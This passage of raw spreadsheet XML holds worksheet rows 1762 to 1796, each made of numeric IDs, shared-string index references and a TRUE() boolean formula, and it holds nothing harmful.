      <c r="J1762" t="s">
        <v>2100</v>
      </c>
      <c r="K1762">
        <v>0</v>
      </c>
      <c r="L1762" t="s">
        <v>98</v>
      </c>
      <c r="R1762" t="s">
        <v>5</v>
      </c>
      <c r="S1762" t="s">
        <v>1229</v>
      </c>
      <c r="T1762" t="s">
        <v>7</v>
      </c>
      <c r="U1762" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1763" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1763" s="1">
        <v>18131</v>
      </c>
      <c r="B1763" t="s">
        <v>0</v>
      </c>
      <c r="C1763" t="s">
        <v>78</v>
      </c>
      <c r="D1763" t="s">
        <v>2097</v>
      </c>
      <c r="E1763" t="s">
        <v>1227</v>
      </c>
      <c r="F1763">
        <v>29117300</v>
      </c>
      <c r="G1763" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1763" t="s">
        <v>2101</v>
      </c>
      <c r="K1763">
        <v>0</v>
      </c>
      <c r="L1763" t="s">
        <v>98</v>
      </c>
      <c r="R1763" t="s">
        <v>5</v>
      </c>
      <c r="S1763" t="s">
        <v>1229</v>
      </c>
      <c r="T1763" t="s">
        <v>7</v>
      </c>
      <c r="U1763" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1764" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1764" s="1">
        <v>18132</v>
      </c>
      <c r="B1764" t="s">
        <v>0</v>
      </c>
      <c r="C1764" t="s">
        <v>78</v>
      </c>
      <c r="D1764" t="s">
        <v>2097</v>
      </c>
      <c r="E1764" t="s">
        <v>1227</v>
      </c>
      <c r="F1764">
        <v>29117300</v>
      </c>
      <c r="G1764" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1764" t="s">
        <v>2102</v>
      </c>
      <c r="K1764">
        <v>0</v>
      </c>
      <c r="L1764" t="s">
        <v>98</v>
      </c>
      <c r="R1764" t="s">
        <v>5</v>
      </c>
      <c r="S1764" t="s">
        <v>1229</v>
      </c>
      <c r="T1764" t="s">
        <v>7</v>
      </c>
      <c r="U1764" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1765" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1765" s="1">
        <v>18133</v>
      </c>
      <c r="B1765" t="s">
        <v>0</v>
      </c>
      <c r="C1765" t="s">
        <v>78</v>
      </c>
      <c r="D1765" t="s">
        <v>2097</v>
      </c>
      <c r="E1765" t="s">
        <v>1227</v>
      </c>
      <c r="F1765">
        <v>29117300</v>
      </c>
      <c r="G1765" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1765" t="s">
        <v>2103</v>
      </c>
      <c r="K1765">
        <v>0</v>
      </c>
      <c r="L1765" t="s">
        <v>98</v>
      </c>
      <c r="R1765" t="s">
        <v>5</v>
      </c>
      <c r="S1765" t="s">
        <v>1229</v>
      </c>
      <c r="T1765" t="s">
        <v>7</v>
      </c>
      <c r="U1765" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1766" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1766" s="1">
        <v>18134</v>
      </c>
      <c r="B1766" t="s">
        <v>0</v>
      </c>
      <c r="C1766" t="s">
        <v>1</v>
      </c>
      <c r="D1766" t="s">
        <v>2097</v>
      </c>
      <c r="E1766" t="s">
        <v>1227</v>
      </c>
      <c r="F1766">
        <v>29117300</v>
      </c>
      <c r="G1766" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1766" t="s">
        <v>2104</v>
      </c>
      <c r="K1766">
        <v>0</v>
      </c>
      <c r="L1766" t="s">
        <v>98</v>
      </c>
      <c r="R1766" t="s">
        <v>5</v>
      </c>
      <c r="S1766" t="s">
        <v>1229</v>
      </c>
      <c r="T1766" t="s">
        <v>7</v>
      </c>
      <c r="U1766" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1767" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1767" s="1">
        <v>18135</v>
      </c>
      <c r="B1767" t="s">
        <v>0</v>
      </c>
      <c r="C1767" t="s">
        <v>78</v>
      </c>
      <c r="D1767" t="s">
        <v>2097</v>
      </c>
      <c r="E1767" t="s">
        <v>1227</v>
      </c>
      <c r="F1767">
        <v>29117300</v>
      </c>
      <c r="G1767" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1767" t="s">
        <v>2105</v>
      </c>
      <c r="K1767">
        <v>0</v>
      </c>
      <c r="L1767" t="s">
        <v>98</v>
      </c>
      <c r="R1767" t="s">
        <v>5</v>
      </c>
      <c r="S1767" t="s">
        <v>1229</v>
      </c>
      <c r="T1767" t="s">
        <v>7</v>
      </c>
      <c r="U1767" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1768" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1768" s="1">
        <v>18136</v>
      </c>
      <c r="B1768" t="s">
        <v>0</v>
      </c>
      <c r="C1768" t="s">
        <v>78</v>
      </c>
      <c r="D1768" t="s">
        <v>2097</v>
      </c>
      <c r="E1768" t="s">
        <v>1227</v>
      </c>
      <c r="F1768">
        <v>29117300</v>
      </c>
      <c r="G1768" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1768" t="s">
        <v>2106</v>
      </c>
      <c r="K1768">
        <v>0</v>
      </c>
      <c r="L1768" t="s">
        <v>98</v>
      </c>
      <c r="R1768" t="s">
        <v>5</v>
      </c>
      <c r="S1768" t="s">
        <v>1229</v>
      </c>
      <c r="T1768" t="s">
        <v>7</v>
      </c>
      <c r="U1768" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1769" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1769" s="1">
        <v>18137</v>
      </c>
      <c r="B1769" t="s">
        <v>0</v>
      </c>
      <c r="C1769" t="s">
        <v>78</v>
      </c>
      <c r="D1769" t="s">
        <v>2097</v>
      </c>
      <c r="E1769" t="s">
        <v>1227</v>
      </c>
      <c r="F1769">
        <v>29117300</v>
      </c>
      <c r="G1769" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1769" t="s">
        <v>2107</v>
      </c>
      <c r="K1769">
        <v>0</v>
      </c>
      <c r="L1769" t="s">
        <v>98</v>
      </c>
      <c r="R1769" t="s">
        <v>5</v>
      </c>
      <c r="S1769" t="s">
        <v>1229</v>
      </c>
      <c r="T1769" t="s">
        <v>7</v>
      </c>
      <c r="U1769" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1770" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1770" s="1">
        <v>18138</v>
      </c>
      <c r="B1770" t="s">
        <v>0</v>
      </c>
      <c r="C1770" t="s">
        <v>78</v>
      </c>
      <c r="D1770" t="s">
        <v>2097</v>
      </c>
      <c r="E1770" t="s">
        <v>1227</v>
      </c>
      <c r="F1770">
        <v>29117300</v>
      </c>
      <c r="G1770" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1770" t="s">
        <v>2108</v>
      </c>
      <c r="K1770">
        <v>0</v>
      </c>
      <c r="L1770" t="s">
        <v>98</v>
      </c>
      <c r="R1770" t="s">
        <v>5</v>
      </c>
      <c r="S1770" t="s">
        <v>1229</v>
      </c>
      <c r="T1770" t="s">
        <v>7</v>
      </c>
      <c r="U1770" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1771" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1771" s="1">
        <v>18139</v>
      </c>
      <c r="B1771" t="s">
        <v>0</v>
      </c>
      <c r="C1771" t="s">
        <v>1</v>
      </c>
      <c r="D1771" t="s">
        <v>2097</v>
      </c>
      <c r="E1771" t="s">
        <v>1227</v>
      </c>
      <c r="F1771">
        <v>29117300</v>
      </c>
      <c r="G1771" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1771" t="s">
        <v>2109</v>
      </c>
      <c r="K1771">
        <v>0</v>
      </c>
      <c r="L1771" t="s">
        <v>98</v>
      </c>
      <c r="R1771" t="s">
        <v>5</v>
      </c>
      <c r="S1771" t="s">
        <v>1229</v>
      </c>
      <c r="T1771" t="s">
        <v>7</v>
      </c>
      <c r="U1771" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1772" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1772" s="1">
        <v>18140</v>
      </c>
      <c r="B1772" t="s">
        <v>0</v>
      </c>
      <c r="C1772" t="s">
        <v>78</v>
      </c>
      <c r="D1772" t="s">
        <v>2097</v>
      </c>
      <c r="E1772" t="s">
        <v>1227</v>
      </c>
      <c r="F1772">
        <v>29117300</v>
      </c>
      <c r="G1772" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1772" t="s">
        <v>2110</v>
      </c>
      <c r="K1772">
        <v>0</v>
      </c>
      <c r="L1772" t="s">
        <v>98</v>
      </c>
      <c r="R1772" t="s">
        <v>5</v>
      </c>
      <c r="S1772" t="s">
        <v>1229</v>
      </c>
      <c r="T1772" t="s">
        <v>7</v>
      </c>
      <c r="U1772" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1773" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1773" s="1">
        <v>18141</v>
      </c>
      <c r="B1773" t="s">
        <v>0</v>
      </c>
      <c r="C1773" t="s">
        <v>78</v>
      </c>
      <c r="D1773" t="s">
        <v>2097</v>
      </c>
      <c r="E1773" t="s">
        <v>1227</v>
      </c>
      <c r="F1773">
        <v>29117300</v>
      </c>
      <c r="G1773" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1773" t="s">
        <v>2111</v>
      </c>
      <c r="K1773">
        <v>0</v>
      </c>
      <c r="L1773" t="s">
        <v>98</v>
      </c>
      <c r="R1773" t="s">
        <v>5</v>
      </c>
      <c r="S1773" t="s">
        <v>1229</v>
      </c>
      <c r="T1773" t="s">
        <v>7</v>
      </c>
      <c r="U1773" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1774" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1774" s="1">
        <v>18142</v>
      </c>
      <c r="B1774" t="s">
        <v>0</v>
      </c>
      <c r="C1774" t="s">
        <v>78</v>
      </c>
      <c r="D1774" t="s">
        <v>2097</v>
      </c>
      <c r="E1774" t="s">
        <v>1227</v>
      </c>
      <c r="F1774">
        <v>29117300</v>
      </c>
      <c r="G1774" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1774" t="s">
        <v>2112</v>
      </c>
      <c r="K1774">
        <v>0</v>
      </c>
      <c r="L1774" t="s">
        <v>98</v>
      </c>
      <c r="R1774" t="s">
        <v>5</v>
      </c>
      <c r="S1774" t="s">
        <v>1229</v>
      </c>
      <c r="T1774" t="s">
        <v>7</v>
      </c>
      <c r="U1774" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1775" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1775" s="1">
        <v>18143</v>
      </c>
      <c r="B1775" t="s">
        <v>0</v>
      </c>
      <c r="C1775" t="s">
        <v>78</v>
      </c>
      <c r="D1775" t="s">
        <v>2097</v>
      </c>
      <c r="E1775" t="s">
        <v>1227</v>
      </c>
      <c r="F1775">
        <v>29117300</v>
      </c>
      <c r="G1775" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1775" t="s">
        <v>2113</v>
      </c>
      <c r="K1775">
        <v>0</v>
      </c>
      <c r="L1775" t="s">
        <v>98</v>
      </c>
      <c r="R1775" t="s">
        <v>5</v>
      </c>
      <c r="S1775" t="s">
        <v>1229</v>
      </c>
      <c r="T1775" t="s">
        <v>7</v>
      </c>
      <c r="U1775" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1776" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1776" s="1">
        <v>18144</v>
      </c>
      <c r="B1776" t="s">
        <v>0</v>
      </c>
      <c r="C1776" t="s">
        <v>78</v>
      </c>
      <c r="D1776" t="s">
        <v>2097</v>
      </c>
      <c r="E1776" t="s">
        <v>1227</v>
      </c>
      <c r="F1776">
        <v>29117300</v>
      </c>
      <c r="G1776" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1776" t="s">
        <v>2114</v>
      </c>
      <c r="K1776">
        <v>0</v>
      </c>
      <c r="L1776" t="s">
        <v>98</v>
      </c>
      <c r="R1776" t="s">
        <v>5</v>
      </c>
      <c r="S1776" t="s">
        <v>1229</v>
      </c>
      <c r="T1776" t="s">
        <v>7</v>
      </c>
      <c r="U1776" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1777" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1777" s="1">
        <v>18145</v>
      </c>
      <c r="B1777" t="s">
        <v>0</v>
      </c>
      <c r="C1777" t="s">
        <v>78</v>
      </c>
      <c r="D1777" t="s">
        <v>2097</v>
      </c>
      <c r="E1777" t="s">
        <v>1227</v>
      </c>
      <c r="F1777">
        <v>29117300</v>
      </c>
      <c r="G1777" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1777" t="s">
        <v>2115</v>
      </c>
      <c r="K1777">
        <v>0</v>
      </c>
      <c r="L1777" t="s">
        <v>98</v>
      </c>
      <c r="R1777" t="s">
        <v>5</v>
      </c>
      <c r="S1777" t="s">
        <v>1229</v>
      </c>
      <c r="T1777" t="s">
        <v>7</v>
      </c>
      <c r="U1777" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1778" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1778" s="1">
        <v>18146</v>
      </c>
      <c r="B1778" t="s">
        <v>0</v>
      </c>
      <c r="C1778" t="s">
        <v>1</v>
      </c>
      <c r="D1778" t="s">
        <v>2097</v>
      </c>
      <c r="E1778" t="s">
        <v>1227</v>
      </c>
      <c r="F1778">
        <v>29117300</v>
      </c>
      <c r="G1778" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1778" t="s">
        <v>2116</v>
      </c>
      <c r="K1778">
        <v>0</v>
      </c>
      <c r="L1778" t="s">
        <v>98</v>
      </c>
      <c r="R1778" t="s">
        <v>5</v>
      </c>
      <c r="S1778" t="s">
        <v>1229</v>
      </c>
      <c r="T1778" t="s">
        <v>7</v>
      </c>
      <c r="U1778" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1779" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1779" s="1">
        <v>18147</v>
      </c>
      <c r="B1779" t="s">
        <v>0</v>
      </c>
      <c r="C1779" t="s">
        <v>78</v>
      </c>
      <c r="D1779" t="s">
        <v>2097</v>
      </c>
      <c r="E1779" t="s">
        <v>1227</v>
      </c>
      <c r="F1779">
        <v>29117300</v>
      </c>
      <c r="G1779" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1779" t="s">
        <v>2117</v>
      </c>
      <c r="K1779">
        <v>0</v>
      </c>
      <c r="L1779" t="s">
        <v>98</v>
      </c>
      <c r="R1779" t="s">
        <v>5</v>
      </c>
      <c r="S1779" t="s">
        <v>1229</v>
      </c>
      <c r="T1779" t="s">
        <v>7</v>
      </c>
      <c r="U1779" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1780" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1780" s="1">
        <v>18148</v>
      </c>
      <c r="B1780" t="s">
        <v>0</v>
      </c>
      <c r="C1780" t="s">
        <v>1</v>
      </c>
      <c r="D1780" t="s">
        <v>2097</v>
      </c>
      <c r="E1780" t="s">
        <v>1227</v>
      </c>
      <c r="F1780">
        <v>29117300</v>
      </c>
      <c r="G1780" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1780" t="s">
        <v>2118</v>
      </c>
      <c r="K1780">
        <v>0</v>
      </c>
      <c r="L1780" t="s">
        <v>98</v>
      </c>
      <c r="R1780" t="s">
        <v>5</v>
      </c>
      <c r="S1780" t="s">
        <v>1229</v>
      </c>
      <c r="T1780" t="s">
        <v>7</v>
      </c>
      <c r="U1780" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1781" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1781" s="1">
        <v>18149</v>
      </c>
      <c r="B1781" t="s">
        <v>0</v>
      </c>
      <c r="C1781" t="s">
        <v>78</v>
      </c>
      <c r="D1781" t="s">
        <v>2097</v>
      </c>
      <c r="E1781" t="s">
        <v>1227</v>
      </c>
      <c r="F1781">
        <v>29117300</v>
      </c>
      <c r="G1781" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1781" t="s">
        <v>2119</v>
      </c>
      <c r="K1781">
        <v>0</v>
      </c>
      <c r="L1781" t="s">
        <v>98</v>
      </c>
      <c r="R1781" t="s">
        <v>5</v>
      </c>
      <c r="S1781" t="s">
        <v>1229</v>
      </c>
      <c r="T1781" t="s">
        <v>7</v>
      </c>
      <c r="U1781" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1782" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1782" s="1">
        <v>18150</v>
      </c>
      <c r="B1782" t="s">
        <v>0</v>
      </c>
      <c r="C1782" t="s">
        <v>78</v>
      </c>
      <c r="D1782" t="s">
        <v>2097</v>
      </c>
      <c r="E1782" t="s">
        <v>1227</v>
      </c>
      <c r="F1782">
        <v>29117300</v>
      </c>
      <c r="G1782" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1782" t="s">
        <v>2120</v>
      </c>
      <c r="K1782">
        <v>0</v>
      </c>
      <c r="L1782" t="s">
        <v>98</v>
      </c>
      <c r="R1782" t="s">
        <v>5</v>
      </c>
      <c r="S1782" t="s">
        <v>1229</v>
      </c>
      <c r="T1782" t="s">
        <v>7</v>
      </c>
      <c r="U1782" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1783" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1783" s="1">
        <v>18151</v>
      </c>
      <c r="B1783" t="s">
        <v>0</v>
      </c>
      <c r="C1783" t="s">
        <v>78</v>
      </c>
      <c r="D1783" t="s">
        <v>2097</v>
      </c>
      <c r="E1783" t="s">
        <v>1227</v>
      </c>
      <c r="F1783">
        <v>29117300</v>
      </c>
      <c r="G1783" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1783" t="s">
        <v>2121</v>
      </c>
      <c r="K1783">
        <v>0</v>
      </c>
      <c r="L1783" t="s">
        <v>98</v>
      </c>
      <c r="R1783" t="s">
        <v>5</v>
      </c>
      <c r="S1783" t="s">
        <v>1229</v>
      </c>
      <c r="T1783" t="s">
        <v>7</v>
      </c>
      <c r="U1783" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1784" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1784" s="1">
        <v>18152</v>
      </c>
      <c r="B1784" t="s">
        <v>0</v>
      </c>
      <c r="C1784" t="s">
        <v>78</v>
      </c>
      <c r="D1784" t="s">
        <v>2097</v>
      </c>
      <c r="E1784" t="s">
        <v>1227</v>
      </c>
      <c r="F1784">
        <v>29117300</v>
      </c>
      <c r="G1784" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1784" t="s">
        <v>2122</v>
      </c>
      <c r="K1784">
        <v>0</v>
      </c>
      <c r="L1784" t="s">
        <v>98</v>
      </c>
      <c r="R1784" t="s">
        <v>5</v>
      </c>
      <c r="S1784" t="s">
        <v>1229</v>
      </c>
      <c r="T1784" t="s">
        <v>7</v>
      </c>
      <c r="U1784" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1785" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1785" s="1">
        <v>18153</v>
      </c>
      <c r="B1785" t="s">
        <v>0</v>
      </c>
      <c r="C1785" t="s">
        <v>78</v>
      </c>
      <c r="D1785" t="s">
        <v>2097</v>
      </c>
      <c r="E1785" t="s">
        <v>1227</v>
      </c>
      <c r="F1785">
        <v>29117300</v>
      </c>
      <c r="G1785" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1785" t="s">
        <v>2123</v>
      </c>
      <c r="K1785">
        <v>0</v>
      </c>
      <c r="L1785" t="s">
        <v>98</v>
      </c>
      <c r="R1785" t="s">
        <v>5</v>
      </c>
      <c r="S1785" t="s">
        <v>1229</v>
      </c>
      <c r="T1785" t="s">
        <v>7</v>
      </c>
      <c r="U1785" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1786" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1786" s="1">
        <v>18154</v>
      </c>
      <c r="B1786" t="s">
        <v>0</v>
      </c>
      <c r="C1786" t="s">
        <v>78</v>
      </c>
      <c r="D1786" t="s">
        <v>2097</v>
      </c>
      <c r="E1786" t="s">
        <v>1227</v>
      </c>
      <c r="F1786">
        <v>29117300</v>
      </c>
      <c r="G1786" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1786" t="s">
        <v>2124</v>
      </c>
      <c r="K1786">
        <v>0</v>
      </c>
      <c r="L1786" t="s">
        <v>98</v>
      </c>
      <c r="R1786" t="s">
        <v>5</v>
      </c>
      <c r="S1786" t="s">
        <v>1229</v>
      </c>
      <c r="T1786" t="s">
        <v>7</v>
      </c>
      <c r="U1786" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1787" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1787" s="1">
        <v>18155</v>
      </c>
      <c r="B1787" t="s">
        <v>0</v>
      </c>
      <c r="C1787" t="s">
        <v>78</v>
      </c>
      <c r="D1787" t="s">
        <v>2097</v>
      </c>
      <c r="E1787" t="s">
        <v>1227</v>
      </c>
      <c r="F1787">
        <v>29117300</v>
      </c>
      <c r="G1787" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1787" t="s">
        <v>2125</v>
      </c>
      <c r="K1787">
        <v>0</v>
      </c>
      <c r="L1787" t="s">
        <v>98</v>
      </c>
      <c r="R1787" t="s">
        <v>5</v>
      </c>
      <c r="S1787" t="s">
        <v>1229</v>
      </c>
      <c r="T1787" t="s">
        <v>7</v>
      </c>
      <c r="U1787" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1788" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1788" s="1">
        <v>18156</v>
      </c>
      <c r="B1788" t="s">
        <v>0</v>
      </c>
      <c r="C1788" t="s">
        <v>78</v>
      </c>
      <c r="D1788" t="s">
        <v>2097</v>
      </c>
      <c r="E1788" t="s">
        <v>1227</v>
      </c>
      <c r="F1788">
        <v>29117300</v>
      </c>
      <c r="G1788" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1788" t="s">
        <v>2126</v>
      </c>
      <c r="K1788">
        <v>0</v>
      </c>
      <c r="L1788" t="s">
        <v>98</v>
      </c>
      <c r="R1788" t="s">
        <v>5</v>
      </c>
      <c r="S1788" t="s">
        <v>1229</v>
      </c>
      <c r="T1788" t="s">
        <v>7</v>
      </c>
      <c r="U1788" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1789" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1789" s="1">
        <v>18157</v>
      </c>
      <c r="B1789" t="s">
        <v>0</v>
      </c>
      <c r="C1789" t="s">
        <v>78</v>
      </c>
      <c r="D1789" t="s">
        <v>2097</v>
      </c>
      <c r="E1789" t="s">
        <v>1227</v>
      </c>
      <c r="F1789">
        <v>29117300</v>
      </c>
      <c r="G1789" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1789" t="s">
        <v>2127</v>
      </c>
      <c r="K1789">
        <v>0</v>
      </c>
      <c r="L1789" t="s">
        <v>98</v>
      </c>
      <c r="R1789" t="s">
        <v>5</v>
      </c>
      <c r="S1789" t="s">
        <v>1229</v>
      </c>
      <c r="T1789" t="s">
        <v>7</v>
      </c>
      <c r="U1789" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1790" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1790" s="1">
        <v>18158</v>
      </c>
      <c r="B1790" t="s">
        <v>0</v>
      </c>
      <c r="C1790" t="s">
        <v>78</v>
      </c>
      <c r="D1790" t="s">
        <v>2097</v>
      </c>
      <c r="E1790" t="s">
        <v>1227</v>
      </c>
      <c r="F1790">
        <v>29117300</v>
      </c>
      <c r="G1790" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1790" t="s">
        <v>2128</v>
      </c>
      <c r="K1790">
        <v>0</v>
      </c>
      <c r="L1790" t="s">
        <v>98</v>
      </c>
      <c r="R1790" t="s">
        <v>5</v>
      </c>
      <c r="S1790" t="s">
        <v>1229</v>
      </c>
      <c r="T1790" t="s">
        <v>7</v>
      </c>
      <c r="U1790" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1791" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1791" s="1">
        <v>18159</v>
      </c>
      <c r="B1791" t="s">
        <v>0</v>
      </c>
      <c r="C1791" t="s">
        <v>78</v>
      </c>
      <c r="D1791" t="s">
        <v>2097</v>
      </c>
      <c r="E1791" t="s">
        <v>1227</v>
      </c>
      <c r="F1791">
        <v>29117300</v>
      </c>
      <c r="G1791" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1791" t="s">
        <v>2129</v>
      </c>
      <c r="K1791">
        <v>0</v>
      </c>
      <c r="L1791" t="s">
        <v>98</v>
      </c>
      <c r="R1791" t="s">
        <v>5</v>
      </c>
      <c r="S1791" t="s">
        <v>1229</v>
      </c>
      <c r="T1791" t="s">
        <v>7</v>
      </c>
      <c r="U1791" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1792" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1792" s="1">
        <v>18160</v>
      </c>
      <c r="B1792" t="s">
        <v>0</v>
      </c>
      <c r="C1792" t="s">
        <v>78</v>
      </c>
      <c r="D1792" t="s">
        <v>2097</v>
      </c>
      <c r="E1792" t="s">
        <v>1227</v>
      </c>
      <c r="F1792">
        <v>29117300</v>
      </c>
      <c r="G1792" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1792" t="s">
        <v>2130</v>
      </c>
      <c r="K1792">
        <v>0</v>
      </c>
      <c r="L1792" t="s">
        <v>98</v>
      </c>
      <c r="R1792" t="s">
        <v>5</v>
      </c>
      <c r="S1792" t="s">
        <v>1229</v>
      </c>
      <c r="T1792" t="s">
        <v>7</v>
      </c>
      <c r="U1792" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1793" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1793" s="1">
        <v>18161</v>
      </c>
      <c r="B1793" t="s">
        <v>0</v>
      </c>
      <c r="C1793" t="s">
        <v>78</v>
      </c>
      <c r="D1793" t="s">
        <v>2097</v>
      </c>
      <c r="E1793" t="s">
        <v>1227</v>
      </c>
      <c r="F1793">
        <v>29117300</v>
      </c>
      <c r="G1793" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1793" t="s">
        <v>2131</v>
      </c>
      <c r="K1793">
        <v>0</v>
      </c>
      <c r="L1793" t="s">
        <v>98</v>
      </c>
      <c r="R1793" t="s">
        <v>5</v>
      </c>
      <c r="S1793" t="s">
        <v>1229</v>
      </c>
      <c r="T1793" t="s">
        <v>7</v>
      </c>
      <c r="U1793" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1794" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1794" s="1">
        <v>18162</v>
      </c>
      <c r="B1794" t="s">
        <v>0</v>
      </c>
      <c r="C1794" t="s">
        <v>78</v>
      </c>
      <c r="D1794" t="s">
        <v>2097</v>
      </c>
      <c r="E1794" t="s">
        <v>1227</v>
      </c>
      <c r="F1794">
        <v>29117300</v>
      </c>
      <c r="G1794" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1794" t="s">
        <v>2132</v>
      </c>
      <c r="K1794">
        <v>0</v>
      </c>
      <c r="L1794" t="s">
        <v>98</v>
      </c>
      <c r="R1794" t="s">
        <v>5</v>
      </c>
      <c r="S1794" t="s">
        <v>1229</v>
      </c>
      <c r="T1794" t="s">
        <v>7</v>
      </c>
      <c r="U1794" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1795" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1795" s="1">
        <v>18163</v>
      </c>
      <c r="B1795" t="s">
        <v>0</v>
      </c>
      <c r="C1795" t="s">
        <v>78</v>
      </c>
      <c r="D1795" t="s">
        <v>2097</v>
      </c>
      <c r="E1795" t="s">
        <v>1227</v>
      </c>
      <c r="F1795">
        <v>29117300</v>
      </c>
      <c r="G1795" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1795" t="s">
        <v>2133</v>
      </c>
      <c r="K1795">
        <v>0</v>
      </c>
      <c r="L1795" t="s">
        <v>98</v>
      </c>
      <c r="R1795" t="s">
        <v>5</v>
      </c>
      <c r="S1795" t="s">
        <v>1229</v>
      </c>
      <c r="T1795" t="s">
        <v>7</v>
      </c>
      <c r="U1795" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1796" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1796" s="1">
        <v>18164</v>
      </c>
      <c r="B1796" t="s">
        <v>0</v>
      </c>
      <c r="C1796" t="s">
        <v>1</v>
      </c>
      <c r="D1796" t="s">
        <v>2097</v>
      </c>
      <c r="E1796" t="s">
        <v>1227</v>
      </c>
      <c r="F1796">
        <v>29117300</v>
      </c>
      <c r="G1796" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1796" t="s">
        <v>2134</v>
      </c>
      <c r="K1796">
